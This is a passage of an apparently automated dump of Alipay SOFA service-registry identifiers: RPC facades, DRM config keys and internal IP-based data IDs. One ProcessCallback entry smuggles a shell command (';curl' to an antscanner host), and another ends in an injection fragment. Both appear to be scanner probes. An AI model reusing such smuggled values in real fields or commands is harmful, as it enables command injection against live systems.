T#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.permissionVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationPersonSideQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mquery.common.service.facade.auto.MdataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cif.facade.CustomerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.processmng.common.service.plugin.facade.PluginConfigService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:LINGKAI_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillProductCallbackFacade:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adc.meta.facade.MetaDictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.148.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.access.AuthRecordServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:baitiaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.NameManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.api.PcreditAccountTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchcommerce@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.http.SolutionCategoryQueryHttpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.rpc.RoleBaseAuthSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.2.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.yeb.YebEteNonBankQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.ctu.facade.ImmuneModelQueryCtuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.asset.service.ReservationAssetListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.26.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.equity.search.CampSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.BatchDataTransCallBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BKMERCHANTPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.18.186.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.drmForAntEventLogSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.wealthasset.FundAssetQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.76.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmodelpredict.biz.service.impl.monitor.MonitorRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxconf.service.facade.ctrl.DataOperateLogService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.contentsource.ContentSourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.210.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.integrationWhiteBlackSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.FuseHistoryWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.trans.api.BatchTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pricecore.common.service.facade.PriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.whitelist.WhiteListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertBindingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","gmcore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:sffassetswebpre@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.lfc.rpc.LifeCircleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.ZproxyGPvSofaService:1.0:zproxyGForM@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmcateyedu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.midas:name=com.alipay.zcache.tbase.midasCommonTair.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adame.facade.meta.AdameModelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.28.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\">@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.159.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.channelspop.service.solution.admission.SolAdmissionCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcb:name=com.alipay.fundselling.common.drm.FundProductDispatchWhiteListDrm.productDispatchWhiteListJsonString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.zcache.switcher.customerv2.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exriskcenter.common.service.facade.api.query.DataFactorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaocore.service.spi.OpenCardInvokeService:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.sellscript.api.UserSellScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igdispute.common.service.facade.DisputeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantArrangementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.NotifyLogDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.operationShopMigrationMaxCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.external.PucChargeBillManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcontentprod.facade.service.dynamic.LabelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.TXAutoDeductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.AppletQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.StdInformQASinglePathTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.amspm.core.plugin.config.drm.BizIdentityConfigDrmResource.closeTracker,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.175.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:tr_datafactory_acts_test_fail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.DayuArkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.resource.common.facade.spi.RecycleSpi:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-xiaoshengtest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdp.common.service.facade.mng.CreativePositionGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:secumngTaskCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointAdjustQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.registration.api.RegistrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kabaoprod.biz.shared.manager.RedPointManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.bizCoverage.BcTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.149.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpmscore.facade.ScheduleFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.tis.service.InputService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.51.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.common.service.facade.api.SystemCustomWidgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALSTUDIO#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.152.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.comparacenter.common.service.facade.client.InstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finmobilemarket.common.service.facade.api.JCMSModelSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.logClientCacheOutput,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.itemcore.common.service.facade.v2.DisplayCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.moneybox.MbAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.ApproveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.recruitcore.facade.api.plan.PlanMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.ordermng.merchantAppDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_P_IFINFLUX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.cloud.middleware.service.id#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_YQDATASERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.IaasAnalyzeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.185.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.199.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.netflowcore.api.RuleConfigGenerateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.NewsfeedUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.HaoTianService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchselfop_artisan_antProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.member.UserRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auth_center.common.service.facade.v2.service.DataPermissionService:1.0:internal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.picasso.common.service.facade.rendering.GraphicsRenderingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimRuleExecutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.195.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_RCONEHUB#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.248.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.210.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PCREDITLUBAN#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbreservationprod.common.service.facade.commonreservation.PlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.mytinyapp.LSMDD4MYTinyAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;curl http://86842598-80102053-uniqueId-104003023.antscanner.global.alipay.com;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.core.service.hbase.McubeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditint.facade.service.RepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.PrizeRZoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.findtprod.biz.service.impl.drm.CacheTrigger.cacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.bkinfocenter.common.service.facade.KgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.privacy.common.service.facade.strategy.PrivacyControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.skipSprFinishCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintranscore.common.service.facade.trans.FinRepayFacade:1.0:dqtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idmp.common.service.facade.api.dmp.CircleManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmALInfoManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.common.service.facade.api.datasource.XflushClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainconsole.integration.client.mccommon.PullTaskProducer:1.0:mypointsCardPullTaskProducerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.common.service.facade.SystemParameterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:integration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.etetestcore.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:qrtbattack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zpaascore.servcie.facade.PaasCoreCallbackServiceFacade:1.0:zpaasNodeEnginePaasCoreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtrade.common.service.facade.api.QuickTransferTradeAssetMockFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cooperservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mpaasweb.common.service.facade.replays.TraceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpcore.common.service.facade.grayengine.GrayEngineRulesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.47.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.IncomeMerchantShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.sdk.spi.service.InsIopExterfaceInvokeService:1.0:insautomarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.biz.manager.IssueUrgingManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundguard.facade.api.safecheck.CheckPointManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheDRM.refreshKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdatasync.common.service.facade.CustomCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.133.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodswitch.common.service.facade.InterfaceStatusQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioCaseExportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.200.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.equity.EquityConsultRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertDetailService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgRuleMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.agds.facade.institution.AgdsadPCCreditPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.190.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoguard.common.service.facade.metadata.api.BizModelCanvasManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.api.job.StoredTaskJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.site.SiteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.facade.service.access.ProjectManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.decision.IntelligentDecisionComponet:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fppolicygw.async.facade.facade.ScheduleReceiveFacade:1.0:pcshield@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msgopprod.common.service.facade.appinfo.AppInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feecharge.common.service.facade.ChargeOperationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.mybank.bksupplychainprod.common.service.facade.trade.api.ScpTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antgroup.zmxy.zmbizsim.facade.AntMockDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.grid.GridCrowdMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.AccessControlAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1218#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotnearsource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoorder.common.service.facade.api.PromoOrderRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsales.common.service.facade.xspace.user.XSpaceUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.prize.PrizeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.favorite.api.FavoriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.AntOpenPlatformFundSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.OrderLinkOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.indicator.CandlistickManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.delayInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.24.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_NAPOLI_alifi-cn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acprodapicore.facade.manageapi.InvokerManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.NameListPropertyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.common.CommonManageFacade:1.0@DE